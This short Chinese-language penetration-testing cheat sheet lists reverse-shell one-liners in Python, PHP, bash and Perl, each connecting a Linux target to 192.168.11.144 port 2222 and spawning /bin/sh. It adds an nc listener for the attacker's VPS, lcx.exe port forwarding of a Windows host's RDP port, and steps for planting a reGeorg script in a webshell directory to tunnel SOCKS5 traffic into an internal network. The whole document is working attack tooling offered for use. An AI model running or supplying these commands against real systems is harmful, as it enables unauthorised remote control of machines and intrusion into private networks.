linux目标机器:
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.11.144”,2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
php -r ‘$sock=fsockopen(“192.168.11.144”,2222);exec(“/bin/sh -i <&3 >&3 2>&3″);’
bash -i>&/dev/tcp/192.168.11.144/2222 0>&1
perl -e ‘use Socket;$i=”192.168.11.144”;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
vps:
nc -lvp 2222 nc下载地址
windows目标机器:
lcx.exe -slave x.x.x.x 2333 192.168.0.15 3389
vps:
lcx.exe -listen 2333 2334
socks反弹:
reGeorg+Proxifier+sockscap(可选)
先把reGeorg里面的对应的脚本丢到网页能访问的地方,例如webshell的目录,然后访问看是否正常;之后本地python reGeorg的py脚本,-u 跟着刚才上传的脚本 -p 指定一个端口,就打开了本地socks5;最后用sockscap,配置本地127.0.0.1和你刚才指定的端口,之后想让哪个工具通过代理进内网就拖到sockscap中
http://www.vuln.cn/6746
Earthwor
https://www.anquanke.com/post/id/85494
http://m.bobao.360.cn/learning/detail/3502.html
